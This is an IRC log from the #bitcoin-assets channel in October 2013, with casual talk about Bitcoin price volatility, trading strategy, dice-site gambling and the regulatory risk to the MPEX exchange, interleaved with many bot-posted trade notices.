12:20:32 <krlbrgmn> what did just happen to the price? Oct 24 12:21:44 <BingoBoingo> Pragmatism in the tradition of James (and Pierce would distinguish himself by surrendering pragmatism to the label or pragmaticism) isn't quite the utilitarianism of Hume or Dewey as it is often presented though. So long as you stop reading James before he goes all Jebus, and spz world peace. Oct 24 12:21:58 <mircea_popescu> ;;ticker Oct 24 12:21:59 <gribble> MtGox BTCUSD ticker | Best bid: 203.20000, Best ask: 204.97933, Bid-ask spread: 1.77933, Last trade: 204.98000, 24 hour volume: 96843.45810453, 24 hour low: 175.30001, 24 hour high: 233.40000, 24 hour vwap: 206.41400 Oct 24 12:22:05 <mircea_popescu> krlbrgmn what ? Oct 24 12:22:47 <krlbrgmn> the flash crash Oct 24 12:23:17 <mircea_popescu> im sorry, price is 200, day min max is 175/233. what flash crash ? Oct 24 12:23:26 <mircea_popescu> did i miss something ? Oct 24 12:23:39 <krlbrgmn> 175/233 is a 25% difference Oct 24 12:23:45 <BingoBoingo> krlbrgmn: Just normal volatility. In an hour we could be at 90 or 320? What can you do? Oct 24 12:24:21 <krlbrgmn> 25% can be considered a flash crash, or not? Oct 24 12:24:27 <Vexual> big yuan influx will enjoy this type of risky trading in the coming 12 months Oct 24 12:24:33 <BingoBoingo> krlbrgmn: Not in Bitcoin really. Oct 24 12:24:59 <BingoBoingo> krlbrgmn: It is too late to blame Pirateat40 so blame LabCoin Oct 24 12:25:08 <mircea_popescu> yeah, kinda par for the course here. you certainly can't say "crash" if the price isn't at day lows. Oct 24 12:25:29 <krlbrgmn> oh well, the fuckers got me into a bear trap Oct 24 12:25:42 <krlbrgmn> sold @190 Oct 24 12:25:48 <krlbrgmn> is it a wise thing to buy back in? Oct 24 12:25:53 <mircea_popescu> in general it's a good idea to set a long term strategy and follow that. Oct 24 12:26:10 <mircea_popescu> the stories you hear about "ordinary citizens just like you" daytrading for a profit are mostly fake. Oct 24 12:26:27 <krlbrgmn> but when you see a 25% decrease in the price, it's hard to keep calm Oct 24 12:26:27 <BingoBoingo> krlbrgmn: Maybe buy back in at $187.50? Everyone has to price and stratagem on their own. Oct 24 12:26:42 <BingoBoingo> krlbrgmn: Have you tried alaprazolam? Oct 24 12:26:53 <mircea_popescu> well, why is it hard ? that's why the long term strategy is a long term strategy. Oct 24 12:26:55 <Vexual> im audi gents. keep it real Oct 24 12:27:14 <BingoBoingo> krlbrgmn: I hear lorezapam works wonders too. Oct 24 12:27:55 <krlbrgmn> mircea_popescu and what long term strategy would sound good to you? Oct 24 12:28:17 <mircea_popescu> well, that's something you'd have to come up with on your own. Oct 24 12:28:39 <mircea_popescu> you know your own circumstance, make some long term predictions and split your effort accordingly. Oct 24 12:30:11 <mircea_popescu> i still have coins i bought at 3.x for that matter. Oct 24 12:30:20 <krlbrgmn> don't you day trade? Oct 24 12:30:24 <mircea_popescu> nope. Oct 24 12:30:39 <mircea_popescu> and you know, a sucker is me for not having sold out at 250 or w/e. Oct 24 12:30:55 <krlbrgmn> I guess I'm learning this the hard way :( Oct 24 12:31:29 <mircea_popescu> so how many btc did you sell at 190 ? Oct 24 12:32:08 <BingoBoingo> Other than piddly shit to acquire coin I made two trades this spring, both at on the same day. Oct 24 12:45:39 <assbot> [HAVELOCK] [AM100] 100 @ 0.0055 = 0.55 BTC [-] Oct 24 12:47:14 <jurov> um, i last daytraded on mtgox maybe year ago. there are more interesting things (such as attempts to tape paint s.nsa) Oct 24 12:48:20 <kakobrekla> i just trade eurusd with btc. Oct 24 12:51:11 <BingoBoingo> Well, I had the sell order sitting there for a nearly a month, but Uppity Tortilla seemed to push it though. Once I have the email it sold I placed the buy and withdrew. I more gamble than trade though. Oct 24 12:52:46 <assbot> [MPEX] [S.MPOE] 8265 @ 0.00082937 = 6.8547 BTC [+] Oct 24 12:54:51 <mircea_popescu> ;;ticker Oct 24 12:54:52 <gribble> MtGox BTCUSD ticker | Best bid: 198.75078, Best ask: 198.84000, Bid-ask spread: 0.08922, Last trade: 198.84000, 24 hour volume: 98613.04119587, 24 hour low: 175.30001, 24 hour high: 233.40000, 24 hour vwap: 206.26809 **** BEGIN LOGGING AT Thu Oct 24 13:14:26 2013 Oct 24 13:15:07 <assbot> [MPEX] [S.MPOE] 21926 @ 0.00082871 = 18.1703 BTC [-] {2} Oct 24 13:16:08 <assbot> [HAVELOCK] [NEOBEE] 126 @ 0.00224993 = 0.2835 BTC [+] Oct 24 13:16:10 <assbot> [MPEX] [S.MPOE] 11100 @ 0.00083539 = 9.2728 BTC [+] {2} Oct 24 13:17:10 <assbot> [HAVELOCK] [NEOBEE] 533 @ 0.00224994 = 1.1992 BTC [+] Oct 24 13:19:12 <assbot> [HAVELOCK] [AM1] 1 @ 0.58999895 BTC [+] Oct 24 13:59:52 <assbot> [MPEX] [S.MPOE] 5300 @ 0.00083316 = 4.4157 BTC [-] {2} Oct 24 14:04:57 <assbot> [HAVELOCK] [AM1] 1 @ 0.56 BTC [-] Oct 24 14:18:09 <assbot> [HAVELOCK] [AM1] 1 @ 0.56 BTC [-] Oct 24 14:25:08 <pankkake> ;;bc,stats Oct 24 14:25:11 <gribble> Current Blocks: 265723 | Current Difficulty: 2.677312494824211E8 | Next Difficulty At Block: 266111 | Next Difficulty In: 388 blocks | Next Difficulty In About: 1 day, 19 hours, 6 minutes, and 39 seconds | Next Difficulty Estimate: 380342143.25 | Estimated Percent Change: 42.06117 Oct 24 14:28:14 <pankkake> ;;market sell 36000 Oct 24 14:28:14 <gribble> A market order to sell 36000 bitcoins right now would net 5634549.7838 USD and would take the last price down to 125.0000 USD, resulting in an average price of 156.5153 USD/BTC. | Data vintage: 214.4859 seconds Oct 24 14:33:24 <assbot> [HAVELOCK] [AM100] 26 @ 0.00550001 = 0.143 BTC [+] Oct 24 14:35:26 <assbot> [HAVELOCK] [AM100] 341 @ 0.00550001 = 1.8755 BTC [+] Oct 24 14:46:38 <assbot> [MPEX] [S.MPOE] 1000 @ 0.00083272 = 0.8327 BTC [-] Oct 24 14:49:41 <assbot> [HAVELOCK] [NEOBEE] 3039 @ 0.00200033 = 6.079 BTC [-] {6} Oct 24 14:49:42 <assbot> [MPEX] [S.NSA] 2000 @ 0.000234 = 0.468 BTC [-] Oct 24 14:50:42 <assbot> [MPEX] [S.MPOE] 9000 @ 0.0008304 = 7.4736 BTC [-] Oct 24 14:59:51 <assbot> [MPEX] [S.MPOE] 12050 @ 0.00083272 = 10.0343 BTC [+] Oct 24 15:00:52 <assbot> [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 24 15:02:11 <KRS1> damnit! stupid sleep. Missed out on a great buying opportunity last night. Oct 24 15:10:45 <KRS1> need a good btc price/volume alarm anyone know of a reliable one? Oct 24 15:12:38 <VanCleef> i'll call your mobile till you wake up Oct 24 15:18:28 <KRS1> ok I'll pm you later to give you the limits/bounds Oct 24 15:22:13 <assbot> [HAVELOCK] [HIM] 5 @ 0.07 = 0.35 BTC [+] Oct 24 15:26:17 <assbot> [HAVELOCK] [AM100] 164 @ 0.00550001 = 0.902 BTC [+] Oct 24 15:32:51 <jurov> http://www.reddit.com/r/Bitcoin/comments/1p465g/whats_happening_at_bitstamp_shootup_order_book_is/ Oct 24 15:32:51 <ozbot> Whats happening at bitstamp? Shootup, order book is not fullfilling. Other exchanges still low : Bit Oct 24 15:32:58 <jurov> cans with a string buckling? Oct 24 15:35:26 <assbot> [HAVELOCK] [AM100] 5056 @ 0.0055 = 27.808 BTC [-] {3} Oct 24 15:35:27 <assbot> [MPEX] [S.MPOE] 1350 @ 0.0008304 = 1.121 BTC [-] Oct 24 15:36:19 <jurov> http://edanyago.me/2013/10/23/a-bubble-for-our-toil-and-trouble/ Oct 24 15:36:20 <ozbot> A Bubble for our Toil and Trouble | Yago tries to write these thoughts. Oct 24 15:36:31 <jurov> "Bitcoin has broken out of its crazy Libertarian mold, and has started to appeal to other sorts of crazies" hahaha Oct 24 15:37:28 <assbot> [HAVELOCK] [AM100] 2663 @ 0.00549996 = 14.6464 BTC [-] {3} Oct 24 15:37:29 <assbot> [HAVELOCK] [AM1] 10 @ 0.56 = 5.6 BTC [-] Oct 24 15:40:08 <VanCleef> industry full of grubs Oct 24 15:59:49 <assbot> [HAVELOCK] [AM100] 250 @ 0.00500001 = 1.25 BTC [-] {3} Oct 24 15:59:51 <assbot> [HAVELOCK] [AM1] 1 @ 0.58999895 BTC [+] Oct 24 16:04:55 <assbot> [HAVELOCK] [CBTC] 5000 @ 0.00015 = 0.75 BTC [-] {3} Oct 24 16:04:57 <assbot> [HAVELOCK] [CFIG] 20 @ 0.1214044 = 2.4281 BTC [-] {2} Oct 24 16:05:56 <assbot> [HAVELOCK] [LABCO] 954 @ 0.00051968 = 0.4958 BTC [-] {6} Oct 24 16:05:57 <assbot> [HAVELOCK] [AM100] 234 @ 0.00557694 = 1.305 BTC [-] {3} Oct 24 16:06:57 <assbot> [HAVELOCK] [AM100] 225 @ 0.00557699 = 1.2548 BTC [+] {2} Oct 24 16:08:59 <assbot> [HAVELOCK] [AM100] 274 @ 0.00557699 = 1.5281 BTC [+] Oct 24 16:10:00 <assbot> [HAVELOCK] [AM100] 317 @ 0.00557699 = 1.7679 BTC [+] {2} Oct 24 16:11:01 <assbot> [HAVELOCK] [HIM] 5 @ 0.07 = 0.35 BTC [+] Oct 24 16:15:05 <assbot> [MPEX] [S.MPOE] 8400 @ 0.00082907 = 6.9642 BTC [-] Oct 24 16:22:12 <assbot> [MPEX] [S.MPOE] 5350 @ 0.00082907 = 4.4355 BTC [-] Oct 24 16:39:29 <assbot> [MPEX] [S.MPOE] 4927 @ 0.00083152 = 4.0969 BTC [+] Oct 24 17:16:05 <assbot> [HAVELOCK] [AM1] 1 @ 0.53131 BTC [-] Oct 24 17:37:27 <assbot> [MPEX] [S.MPOE] 4200 @ 0.00082879 = 3.4809 BTC [-] Oct 24 17:48:37 <assbot> [HAVELOCK] [NEOBEE] 50 @ 0.00224992 = 0.1125 BTC [+] Oct 24 17:50:39 <assbot> [MPEX] [S.MPOE] 8800 @ 0.00082857 = 7.2914 BTC [-] Oct 24 18:07:56 <assbot> [HAVELOCK] [CFIG] 2 @ 0.12121212 = 0.2424 BTC [-] Oct 24 18:08:57 <assbot> [HAVELOCK] [CFIG] 9 @ 0.13318435 = 1.1987 BTC [+] {4} Oct 24 18:47:36 <assbot> [MPEX] [S.MPOE] 6568 @ 0.00082784 = 5.4373 BTC [-] {3} Oct 24 19:01:50 <assbot> [MPEX] [S.MPOE] 5178 @ 0.00082863 = 4.2906 BTC [+] Oct 24 19:18:06 <assbot> [MPEX] [S.MPOE] 8800 @ 0.00082863 = 7.2919 BTC [+] Oct 24 19:30:17 <assbot> [HAVELOCK] [AM100] 77 @ 0.00505 = 0.3889 BTC [+] Oct 24 19:38:25 <assbot> [HAVELOCK] [AM100] 37 @ 0.005 = 0.185 BTC [-] Oct 24 19:48:21 <nubbins`> ;;seen mircea_popescu Oct 24 19:48:22 <gribble> mircea_popescu was last seen in #bitcoin-assets 6 hours, 53 minutes, and 29 seconds ago: <mircea_popescu> ;;ticker Oct 24 20:04:33 <deadweasel> --ticker Oct 24 20:21:08 <assbot> [MPEX] [S.MPOE] 24950 @ 0.0008288 = 20.6786 BTC [+] {2} Oct 24 20:21:56 <skinnkavaj> Bitcoin down, Litecoin UP Oct 24 20:22:52 <skinnkavaj> pankkake: you ready for november? Oct 24 20:23:13 <skinnkavaj> mircea_popescu? Oct 24 20:23:45 <pankkake> that's why you sold litecoins earlier and bought at the bottom then? Oct 24 20:24:06 <pankkake> I'm not really seeing what you're saying though Oct 24 20:25:07 <pankkake> volume is pretty low Oct 24 20:25:35 <skinnkavaj> low? Oct 24 20:25:42 <skinnkavaj> one million LTC switching hands yesterday Oct 24 20:28:18 <pankkake> oh so recovery is 0.01 average. noted Oct 24 20:32:50 <KRS-> heh Oct 24 20:33:20 <assbot> [HAVELOCK] [AM100] 570 @ 0.00507592 = 2.8933 BTC [-] {7} Oct 24 20:33:45 <pankkake> today my ass is like http://virtualminingcorp.com/example/slider55.jpg :/ Oct 24 20:40:33 <jborkl> wtf, is that real.. lol Oct 24 20:42:29 <assbot> [HAVELOCK] [AM100] 500 @ 0.00520001 = 2.6 BTC [+] Oct 24 20:42:30 <assbot> [MPEX] [S.MPOE] 6827 @ 0.00082945 = 5.6627 BTC [+] Oct 24 20:43:30 <assbot> [HAVELOCK] [AM100] 77 @ 0.00498001 = 0.3835 BTC [-] Oct 24 20:44:31 <assbot> [HAVELOCK] [AM100] 200 @ 0.00497999 = 0.996 BTC [-] {3} Oct 24 20:46:33 <assbot> [HAVELOCK] [AM100] 77 @ 0.00498 = 0.3835 BTC [+] Oct 24 20:56:31 <kakobrekla> that thing still exists? Oct 24 20:58:01 <kakobrekla> too bad you turned down mpex eh Oct 24 20:59:16 <bob____> i hear the sec has a lot of pull in romania Oct 24 21:01:37 <pankkake> it can Oct 24 21:01:45 <pankkake> but it can't control the internets Oct 24 21:01:55 <bob____> yeah, but they've only managed to crap on gox's us accounts, and btct (based in US, no?). so not sure what it could do to mpex Oct 24 21:02:23 <pankkake> well, he'll "sell" mpex to someone else when he's in prison Oct 24 21:03:14 <bob____> idk. the poker/gambling websites that allowed americans only got in trouble through: 1) the banks or 2) when the founders entered the US Oct 24 21:03:44 <bob____> but mp is? Oct 24 21:03:50 <assbot> [HAVELOCK] [B] [XBOND] 323 @ 0.00114799 = 0.3708 BTC [+] {2} Oct 24 21:03:56 <bob____> mpex is awesome and all, but they were bigger Oct 24 21:04:01 <bob____> ah Oct 24 21:04:04 <bob____> hm Oct 24 21:04:18 <pankkake> move mpex to somalia Oct 24 21:04:19 <pankkake> done Oct 24 21:04:45 <bob____> idk.. the fucking pirate bay is still up Oct 24 21:05:00 <bob____> i don't buy it. mp > sec. Oct 24 21:05:31 <pankkake> The Somaliland shilling is the official currency of Somaliland, a self-declared republic that is internationally recognized as an autonomous region of Somalia.[5] The currency is not recognized as legal tender by the international community, and it currently has no official exchange rate. Oct 24 21:05:39 <pankkake> I see an exchange opportunity! Oct 24 21:06:41 <bob____> hell, isn't wikileaks still up? Oct 24 21:06:54 <bob____> us isn't quite omnipotent Oct 24 21:06:56 <pankkake> bob____: indeed. you can't stop the internet Oct 24 21:07:15 <pankkake> and they can't cut finances anymore Oct 24 21:07:46 <pankkake> which was the big angle of attack against torrent sites I used Oct 24 21:08:00 <pankkake> now most of them have bitcoin options, some as the default donation option Oct 24 21:08:24 <pankkake> wikileaks has billions of mirrors Oct 24 21:09:13 <bob____> yes, but, the website is till up! so mpex will be ok :) Oct 24 21:09:31 <pankkake> mp will outrun them with his horse Oct 24 21:09:36 <bob____> heh Oct 24 21:10:04 <nubbins`> <bob____> idk.. the fucking pirate bay is still up Oct 24 21:10:05 <nubbins`> ^ Oct 24 21:10:59 <pankkake> tpb is less and less relevant but it seems it is kept up just to stick it to the man Oct 24 21:13:49 <skinnkavaj> pankkake Oct 24 21:13:51 <skinnkavaj> Even better investment Oct 24 21:13:59 <assbot> [MPEX] [S.MPOE] 8535 @ 0.00082738 = 7.0617 BTC [-] Oct 24 21:14:03 <skinnkavaj> Throw your LTC here Oct 24 21:14:04 <skinnkavaj> https://dicenow.com/ Oct 24 21:14:06 <ozbot> dicenow Oct 24 21:14:29 <pankkake> why not throw bitcoins there? Oct 24 21:14:44 <skinnkavaj> pankkake: LTC is the most popular played Oct 24 21:15:02 <skinnkavaj> Not even worth investing with BTC there, too low volume Oct 24 21:15:20 <benkay> litecoin - it's for gamblers! Oct 24 21:15:23 <pankkake> does that compensate the loss of value (or risk of) of litecoins, compared to putting them into another of the many dice sites? Oct 24 21:15:55 <pankkake> but I would agree that there is no reason to have litecoins and not invest them someplace. that's what I did Oct 24 21:16:06 <skinnkavaj> pankkake: This one you can choose investment strategy and how much you RISK each bet. I have an investment that has made 90% profit Oct 24 21:17:02 <assbot> [HAVELOCK] [AM100] 29 @ 0.00500017 = 0.145 BTC [-] {2} Oct 24 21:17:41 <skinnkavaj> pankkake is speechless again Oct 24 21:18:52 <deadweasel> please don't use investment and betting in the same sentence. Oct 24 21:19:06 <bob____> hopefully he means investing on the house side Oct 24 21:19:14 <deadweasel> god i hope so Oct 24 21:19:16 <pankkake> but this has nothing to do with litecoin. nor any of your investment prowess, this profit being a random occurence Oct 24 21:19:31 <deadweasel> teh maffs! Oct 24 21:19:34 <pankkake> yes, the litecoin house shows a 113% profit for now Oct 24 21:20:11 <pankkake> it is very very lucky Oct 24 21:20:33 <pankkake> hm is it a percentage or absolute? Oct 24 21:22:08 <pankkake> skinnkavaj: did you invest or other dice sites? Oct 24 21:22:28 <pankkake> and what edge did you chose? Oct 24 21:30:40 <skinnkavaj> pankkake: stop asking me go look on the site yourself, you can choose kelly Oct 24 21:31:49 <pankkake> it looks like you can chose the edge, not the max bet. I hope you understand how dice sites work too Oct 24 21:32:50 <skinnkavaj> pankkake: please stop writing, i made the 90% profit by investing in 10x kelly Oct 24 21:34:24 <pankkake> so you're just trying to show you made up for your losses? I don't really see the point in claiming profits Oct 24 21:35:03 <kakobrekla> skinnkavaj keep it up youll be the new WB in a few weeks Oct 24 21:35:18 <pankkake> Warner Bros? Oct 24 21:35:21 <assbot> [HAVELOCK] [NEOBEE] 50 @ 0.00224991 = 0.1125 BTC [-] Oct 24 21:35:48 <pankkake> there was this guy, fractal, who taunted people here too Oct 24 21:36:06 <kakobrekla> yes he is notorious for his investments ? Oct 24 21:37:33 <pankkake> http://log.bitcoin-assets.com/?date=21-09-2013&bots=true#324779 Oct 24 21:37:34 <ozbot> #bitcoin-assets log Oct 24 21:37:37 <skinnkavaj> breaking news btc-e chat taken over by trolls Oct 24 21:38:02 <pankkake> I for one would not be glad if you lost more money skinnkavaj Oct 24 21:38:09 <pankkake> because I am a nice person deep down Oct 24 21:47:33 <assbot> [HAVELOCK] [AM100] 108 @ 0.0050074 = 0.5408 BTC [+] {2} Oct 24 21:59:20 <mod6> ;;bc,stats Oct 24 21:59:23 <gribble> Current Blocks: 265792 | Current Difficulty: 2.677312494824211E8 | Next Difficulty At Block: 266111 | Next Difficulty In: 319 blocks | Next Difficulty In About: 1 day, 11 hours, 26 minutes, and 39 seconds | Next Difficulty Estimate: 381202887.074 | Estimated Percent Change: 42.38266 Oct 24 22:00:21 <nubbins`> deep down Oct 24 22:14:16 <ThickAsThieves> http://www.wired.co.uk/news/archive/2013-10/24/bitcoin-exchange-collapse-glbse Oct 24 22:14:16 <ozbot> Founder reflects on the closure of Bitcoin stock exchange GLBSE (Wired UK) Oct 24 22:14:55 <jcpham> gtfo Oct 24 22:16:01 <assbot> [MPEX] [S.MPOE] 4550 @ 0.00082577 = 3.7573 BTC [-] Oct 24 22:23:13 <ThickAsThieves> http://www.bloomberg.com/news/2013-10-24/fortress-s-novogratz-says-bitcoin-will-be-worth-a-lot-.html Oct 24 22:24:08 <pankkake> who said everyone should own a bitcoin, or something? Oct 24 22:35:20 <assbot> [HAVELOCK] [AM100] 60 @ 0.00486838 = 0.2921 BTC [-] {2} Oct 24 22:37:05 <nubbins`> i think it was bill gates Oct 24 22:42:28 <assbot> [MPEX] [S.MPOE] 5700 @ 0.00082311 = 4.6917 BTC [-] Oct 24 22:44:29 <assbot> [HAVELOCK] [NEOBEE] 158 @ 0.00224991 = 0.3555 BTC [-] {2} Oct 24 22:50:35 <assbot> [HAVELOCK] [AM100] 1004 @ 0.00500003 = 5.02 BTC [-] {2} Oct 24 22:56:36 <nubbins`> i've really been getting into the melvins lately Oct 24 22:56:42 <assbot> [MPEX] [S.MPOE] 5250 @ 0.00082523 = 4.3325 BTC [+] Oct 24 22:57:27 <pankkake> http://www.wired.com/gamelife/2013/10/gaming-kickstarters/ Oct 24 22:57:28 <ozbot> Over Budget, Behind Schedule: What's Up With Gaming's Biggest Kickstarters? | Game|Life | Wired.com Oct 24 22:59:50 <dexX7> ThickAsThieves: any comment as am board member? https://bitcointalk.org/index.php?topic=99497.msg3404281#msg3404281 Oct 24 23:00:45 <assbot> [HAVELOCK] [AM1] 1 @ 0.579 BTC [+] Oct 24 23:00:56 <nubbins`> hmm Oct 24 23:03:48 <assbot> [HAVELOCK] [AM1] 10 @ 0.58759684 = 5.876 BTC [+] {4} Oct 24 23:04:49 <assbot> [HAVELOCK] [AM1] 10 @ 0.6094 = 6.094 BTC [+] {3} Oct 24 23:06:51 <assbot> [HAVELOCK] [AM1] 2 @ 0.6259 = 1.2518 BTC [+] Oct 24 23:08:52 <KRS-> melvins? Oct 24 23:08:53 <assbot> [HAVELOCK] [AM100] 176 @ 0.00537441 = 0.9459 BTC [+] {3} Oct 24 23:08:59 <nubbins`> yeah Oct 24 23:09:54 <assbot> [HAVELOCK] [AM100] 39 @ 0.0054987 = 0.2144 BTC [+] {2} Oct 24 23:09:55 <assbot> [HAVELOCK] [AM1] 3 @ 0.62899999 = 1.887 BTC [+] Oct 24 23:10:37 <nubbins`> http://www.youtube.com/watch?v=LflAGUGxd9A Oct 24 23:10:37 <ozbot> Melvins Live at Amoeba - YouTube Oct 24 23:12:43 <ThickAsThieves> dexX7, all official statements about AM updates are made by Friedcat. I have no personal comment. Oct 24 23:12:57 <assbot> [HAVELOCK] [AM1] 3 @ 0.62899999 = 1.887 BTC [+] Oct 24 23:13:58 <assbot> [HAVELOCK] [AM1] 9 @ 0.63318888 = 5.6987 BTC [+] {6} Oct 24 23:14:55 <pankkake> to the moons! Oct 24 23:14:59 <assbot> [HAVELOCK] [AM100] 187 @ 0.0051 = 0.9537 BTC [-] {2} Oct 24 23:15:00 <assbot> [HAVELOCK] [AM1] 27 @ 0.67514814 = 18.229 BTC [+] {3} Oct 24 23:15:01 <assbot> [MPEX] [S.MPOE] 1450 @ 0.00082523 = 1.1966 BTC [+] Oct 24 23:15:08 <dexX7> oh well Oct 24 23:16:00 <assbot> [HAVELOCK] [AM100] 1083 @ 0.0051 = 5.5233 BTC [-] {3} Oct 24 23:19:04 <assbot> [HAVELOCK] [AM1] 1 @ 0.70999995 BTC [+] Oct 24 23:23:07 <assbot> [HAVELOCK] [AM100] 54 @ 0.00549998 = 0.297 BTC [+] Oct 24 23:24:08 <assbot> [HAVELOCK] [AM100] 64 @ 0.00549998 = 0.352 BTC [+] {3} Oct 24 23:26:10 <assbot> [HAVELOCK] [AM100] 85 @ 0.0055694 = 0.4734 BTC [+] {3} Oct 24 23:27:11 <assbot> [HAVELOCK] [AM100] 177 @ 0.00575592 = 1.0188 BTC [+] {5} Oct 24 23:28:12 <assbot> [HAVELOCK] [AM100] 700 @ 0.00601493 = 4.2105 BTC [+] {9} Oct 24 23:28:13 <assbot> [HAVELOCK] [AM1] 14 @ 0.739 = 10.346 BTC [+] Oct 24 23:28:14 <assbot> [HAVELOCK] [DEALCO] 20 @ 0.00705549 = 0.1411 BTC [-] {4} Oct 24 23:29:13 <assbot> [HAVELOCK] [DEALCO] 280 @ 0.0040244 = 1.1268 BTC [-] {4} Oct 24 23:29:14 <assbot> [HAVELOCK] [AM100] 498 @ 0.00619999 = 3.0876 BTC [+] {4} Oct 24 23:29:15 <assbot> [HAVELOCK] [AM1] 1 @ 0.7489 BTC [+] Oct 24 23:30:14 <assbot> [HAVELOCK] [AM100] 97 @ 0.00643814 = 0.6245 BTC [+] {3} Oct 24 23:31:15 <assbot> [HAVELOCK] [AM1] 27 @ 0.79090364 = 21.3544 BTC [+] {8} Oct 24 23:31:41 <pankkake> :o Oct 24 23:39:23 <assbot> [HAVELOCK] [AM100] 558 @ 0.00670355 = 3.7406 BTC [+] {11} Oct 24 23:40:24 <assbot> [HAVELOCK] [AM100] 388 @ 0.00691 = 2.6811 BTC [+] {2} Oct 24 23:45:29 <assbot> [HAVELOCK] [AM1] 9 @ 0.795 = 7.155 BTC [+] Oct 24 23:47:31 <assbot> [MPEX] [S.MPOE] 9500 @ 0.00082757 = 7.8619 BTC [+] {2} Oct 24 23:48:32 <assbot> [HAVELOCK] [AM1] 1 @ 0.79999998 BTC [+] Oct 24 23:50:35 <assbot> [HAVELOCK] [AM1] 60 @ 0.795 = 47.7 BTC [-] Oct 24 23:51:21 <bob____> i guess everybody liked the chinese video Oct 24 23:51:35 <assbot> [HAVELOCK] [AM100] 1605 @ 0.00702062 = 11.2681 BTC [+] {16} Oct 24 23:52:36 <assbot> [HAVELOCK] [AM100] 146 @ 0.00747998 = 1.0921 BTC [+] Oct 24 23:55:39 <assbot> [HAVELOCK] [AM100] 330 @ 0.00688484 = 2.272 BTC [-] {2} Oct 25 00:01:45 <assbot> [HAVELOCK] [AM100] 20 @ 0.0073999 = 0.148 BTC [+] Oct 25 00:04:48 <assbot> [HAVELOCK] [AM1] 3 @ 0.7944 = 2.3832 BTC [-] Oct 25 00:05:28 <pankkake> http://www.dailydot.com/technology/tor-freenet-i2p-anonymous-network/ Oct 25 00:05:29 <ozbot> The Daily Dot - Tor and the rise of anonymity networks Oct 25 00:07:51 <assbot> [HAVELOCK] [AM1] 15 @ 0.79813332 = 11.972 BTC [+] {2} Oct 25 00:13:58 <assbot> [HAVELOCK] [AM1] 2 @ 0.795 = 1.59 BTC [-] Oct 25 00:13:59 <assbot> [HAVELOCK] [AM100] 22 @ 0.0072 = 0.1584 BTC [-] Oct 25 00:16:00 <assbot> [HAVELOCK] [NEOBEE] 716 @ 0.00200735 = 1.4373 BTC [-] {6} Oct 25 00:17:01 <assbot> [HAVELOCK] [NEOBEE] 479 @ 0.00200001 = 0.958 BTC [-] Oct 25 00:18:02 <assbot> [HAVELOCK] [NEOBEE] 57 @ 0.00198847 = 0.1133 BTC [-] {4} Oct 25 00:19:03 <assbot> [HAVELOCK] [NEOBEE] 82 @ 0.00192081 = 0.1575 BTC [-] {2} Oct 25 00:19:07 <dexX7> http://www.wired.co.uk/news/archive/2013-10/24/bitcoin-exchange-collapse-glbse Oct 25 00:19:08 <ozbot> Founder reflects on the closure of Bitcoin stock exchange GLBSE (Wired UK) Oct 25 00:19:22 <nubbins`> "reflects" Oct 25 00:21:05 <assbot> [HAVELOCK] [AM100] 136 @ 0.00716187 = 0.974 BTC [-] {3} Oct 25 00:22:06 <assbot> [HAVELOCK] [AM100] 24 @ 0.00728999 = 0.175 BTC [+] Oct 25 00:24:08 <assbot> [HAVELOCK] [AM100] 36 @ 0.0075725 = 0.2726 BTC [+] {4} Oct 25 00:25:09 <assbot> [HAVELOCK] [AM100] 124 @ 0.00770241 = 0.9551 BTC [+] {3} Oct 25 00:26:10 <assbot> [HAVELOCK] [AM100] 45 @ 0.0078 = 0.351 BTC [+] Oct 25 00:45:28 <assbot> [HAVELOCK] [NEOBEE] 1059 @ 0.0019213 = 2.0347 BTC [+] {6} Oct 25 00:46:29 <assbot> [HAVELOCK] [AM100] 50 @ 0.0077 = 0.385 BTC [-] Oct 25 00:47:30 <assbot> [HAVELOCK] [NEOBEE] 748 @ 0.00191455 = 1.4321 BTC [-] {3} Oct 25 00:48:31 <assbot> [HAVELOCK] [AM100] 298 @ 0.00778117 = 2.3188 BTC [+] {4} Oct 25 00:49:32 <assbot> [HAVELOCK] [AM100] 33 @ 0.00788757 = 0.2603 BTC [+] {3} Oct 25 00:54:37 <assbot> [HAVELOCK] [AM1] 62 @ 0.79999998 = 49.6 BTC [+] {2} Oct 25 00:55:38 <assbot> [HAVELOCK] [AM1] 1 @ 0.8 BTC [+] Oct 25 00:57:40 <assbot> [HAVELOCK] [AM1] 3 @ 0.8 = 2.4 BTC [+] Oct 25 00:59:42 <assbot> [HAVELOCK] [AM100] 140 @ 0.00788999 = 1.1046 BTC [+] {2} Oct 25 01:01:44 <assbot> [HAVELOCK] [AM100] 27 @ 0.00799629 = 0.2159 BTC [+] {2} Oct 25 01:01:45 <assbot> [HAVELOCK] [AM1] 1 @ 0.8190069 BTC [+] Oct 25 01:03:46 <assbot> [HAVELOCK] [AM100] 60 @ 0.008 = 0.48 BTC [+] Oct 25 01:04:12 <bob____> breaking news: chinese girl makes video about her cat and AM shoots up 60%! Oct 25 01:05:48 <assbot> [HAVELOCK] [AM1] 7 @ 0.85471624 = 5.983 BTC [+] {3} Oct 25 01:05:56 <nubbins`> heh Oct 25 01:06:15 <saulimus> hmm. how about: girl chops up cat and fries it? .... fried cat Oct 25 01:06:36 <saulimus> LOLLLL Oct 25 01:08:24 <pankkake> well, this show how much people are eager for news Oct 25 01:11:54 <assbot> [HAVELOCK] [AM1] 5 @ 0.869 = 4.345 BTC [+] Oct 25 01:12:55 <assbot> [HAVELOCK] [AM100] 125 @ 0.00810799 = 1.0135 BTC [+] {6} Oct 25 01:13:56 <assbot> [HAVELOCK] [AM1] 1 @ 0.915 BTC [+] Oct 25 01:13:57 <assbot> [HAVELOCK] [AM100] 488 @ 0.00854713 = 4.171 BTC [+] {6} Oct 25 01:14:57 <assbot> [HAVELOCK] [AM100] 188 @ 0.00869 = 1.6337 BTC [+] {2} Oct 25 01:14:58 <assbot> [HAVELOCK] [AM1] 8 @ 0.915 = 7.32 BTC [+] {2} Oct 25 01:15:58 <assbot> [HAVELOCK] [AM100] 312 @ 0.00869 = 2.7113 BTC [+] {5} Oct 25 01:15:59 <assbot> [HAVELOCK] [AM1] 2 @ 0.95 = 1.9 BTC [+] Oct 25 01:16:13 <davout> https://bitcoinfoundation.org/blog/?p=290 Oct 25 01:16:47 <the20year> the SEC's new crowdfunding rules could be quite interesting for exchanges and US customers Oct 25 01:16:59 <assbot> [HAVELOCK] [AM1] 9 @ 0.96799999 = 8.712 BTC [+] {2} Oct 25 01:17:05 <skinnkavaj> WTF LTC Oct 25 01:17:07 <skinnkavaj> Stop moving so fast Oct 25 01:17:53 <dexX7> no no Oct 25 01:17:55 <dexX7> that's good Oct 25 01:17:55 <dexX7> hehe 